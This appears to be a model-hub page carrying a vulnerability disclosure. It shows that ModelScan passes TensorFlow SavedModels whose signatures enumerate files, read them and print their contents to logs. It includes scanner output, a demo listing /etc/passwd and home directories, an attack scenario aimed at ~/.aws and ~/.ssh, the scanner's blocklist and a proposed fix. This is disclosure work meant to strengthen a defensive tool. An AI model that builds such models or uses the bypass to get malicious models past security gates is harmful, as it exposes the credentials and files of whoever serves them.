You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

Log in or Sign Up to review the conditions and access this model content.

TF SAVEDMODEL SCANNER BYPASS β€” FILESYSTEM OPS NOT FLAGGED

Tested on: ModelScan v0.8.7 Format: TensorFlow SavedModel (saved_model.pb inside a SavedModel directory)

================================================================================ SUMMARY

ModelScan scans TensorFlow SavedModels for known "unsafe ops" without executing them. This report shows a gap where a SavedModel includes filesystem-capable ops (file enumeration and reading via dataset/file ops), yet passes scanning because these ops are not in ModelScan's unsafe-op list.

================================================================================ THREAT MODEL

  • Victim loads and executes an untrusted SavedModel in CI/serving pipeline
  • Model server (TF Serving, Triton, etc.) automatically calls signatures
  • Logs may be collected centrally (common in production deployments)

================================================================================ TRIGGER CONDITION

The malicious behavior executes when a graph signature is run (typical inference call), not at load-time. The PoC model exposes these signatures:

  • enumerate_files(pattern) -> uses MatchingFiles op
  • read_text_file(filepath) -> uses TextLineDataset op
  • exfil_files(pattern) -> uses MatchingFiles + PrintV2 ops

================================================================================ PROOF-1: ModelScan Output (Bypass Confirmed)

$ modelscan --version modelscan, version 0.8.7

$ modelscan --path ultimate_attack_poc/ Scanning ultimate_attack_poc/fingerprint.pb using modelscan.scanners.SavedModelTensorflowOpScan Scanning ultimate_attack_poc/saved_model.pb using modelscan.scanners.SavedModelTensorflowOpScan

--- Summary --- No issues found!

================================================================================ PROOF-2: Dangerous Ops Present in saved_model.pb

Core dangerous ops (NOT BLOCKED):

MatchingFiles <-- FILESYSTEM ENUMERATION (HIGH) TextLineDataset <-- FILE CONTENT READING (HIGH) PrintV2 <-- DATA EXFIL TO LOGS (MEDIUM - depends on log collection)

Supporting ops:

DatasetCardinality <-- Metadata disclosure (file line count) FlatMapDataset <-- Dataset iteration TensorSliceDataset <-- Dataset iteration

Note: ReadFile and WriteFile are NOT present in this model. The model uses alternative filesystem ops that provide equivalent capabilities but are not in ModelScan's blocklist.

================================================================================ PROOF-3: SavedModel Signatures

$ saved_model_cli show --dir ultimate_attack_poc --all

Concrete Functions: Function Name: 'enumerate_files' Callable with: Argument #1 pattern: TensorSpec(shape=(), dtype=tf.string)

Function Name: 'read_text_file' Callable with: Argument #1 filepath: TensorSpec(shape=(), dtype=tf.string)

Function Name: 'exfil_files' Callable with: Argument #1 pattern: TensorSpec(shape=(), dtype=tf.string)

================================================================================ PROOF-4: Execution Demonstration

import tensorflow as tf model = tf.saved_model.load('ultimate_attack_poc')

TRIGGER: Running 'enumerate_files' signature (MatchingFiles op)

model.enumerate_files('/etc/pass*') ['/etc/passwd', '/etc/passwd-']

TRIGGER: Running 'enumerate_files' to discover home directories

model.enumerate_files('/home/*') ['/home/', '/home/ubuntu']

TRIGGER: Running 'exfil_files' signature (PrintV2 op)

model.exfil_files('/home/*') EXFILTRATED: ["/home/" "/home/ubuntu"] # <-- appears in TF logs

================================================================================ ATTACK SCENARIO (REALISTIC)

  1. Attacker publishes a "normal-looking" TensorFlow SavedModel (e.g., image classifier) to a model hub or internal registry.

  2. Model passes ModelScan security gate - scanner reports "No issues found!"

  3. Victim's model server (TF Serving, Triton, etc.) loads the model and automatically runs inference when requests arrive.

  4. On each inference call, the model:

    • Enumerates local files via MatchingFiles (discovers ~/.aws/, ~/.ssh/)
    • Reads file contents via TextLineDataset (if text files)
    • Optionally prints data via PrintV2 (appears in TF logs)
  5. If logs are shipped to central logging (Splunk, ELK, CloudWatch - common in production), attacker can retrieve the exfiltrated data.

================================================================================ IMPACT

Impact Severity Description
Scanner bypass HIGH Model passes scan despite filesystem ops
Filesystem enumeration HIGH MatchingFiles discovers sensitive paths
File content reading HIGH TextLineDataset reads accessible files
Log-based exfiltration MEDIUM PrintV2 leaks data (if logs collected)

This bypass defeats ModelScan's guarantee that filesystem access in SavedModels is detected, allowing malicious models to pass automated security gates.

Note: All file access is limited to files readable by the serving process user.

================================================================================ MODELSCAN BLOCKLIST ANALYSIS

Current blocklist in modelscan/settings.py:

"unsafe_tf_operators": { "ReadFile": "HIGH", "WriteFile": "HIGH", }

These filesystem ops are NOT blocked:

Op Capability Risk
MatchingFiles Enumerate files via glob HIGH
TextLineDataset Read text file line-by-line HIGH
PrintV2 Output to logs (exfil vector) MEDIUM

================================================================================ RECOMMENDED FIX (SCANNER-SIDE)

Expand the unsafe-operator coverage for filesystem-related TensorFlow ops:

"unsafe_tf_operators": { # Currently blocked "ReadFile": "HIGH", "WriteFile": "HIGH",

# Should be added (file enumeration)
"MatchingFiles": "HIGH",

# Should be added (file reading via datasets)
"TextLineDataset": "HIGH",
"TextLineDatasetV2": "HIGH",
"FixedLengthRecordDataset": "HIGH",

# Should be added (potential exfiltration - depends on log setup)
"PrintV2": "MEDIUM",

}

================================================================================ FILES PROVIDED

ultimate_attack_poc/ β”œβ”€β”€ saved_model.pb # Contains the dangerous ops β”œβ”€β”€ fingerprint.pb └── variables/ β”œβ”€β”€ variables.data-00000-of-00001 └── variables.index

================================================================================ REFERENCES

================================================================================

Researcher: Karim Foughali Email: kfoughali@dzlaws.org Date: January 2026

Downloads last month
-
Inference Providers NEW
This model isn't deployed by any Inference Provider. πŸ™‹ Ask for provider support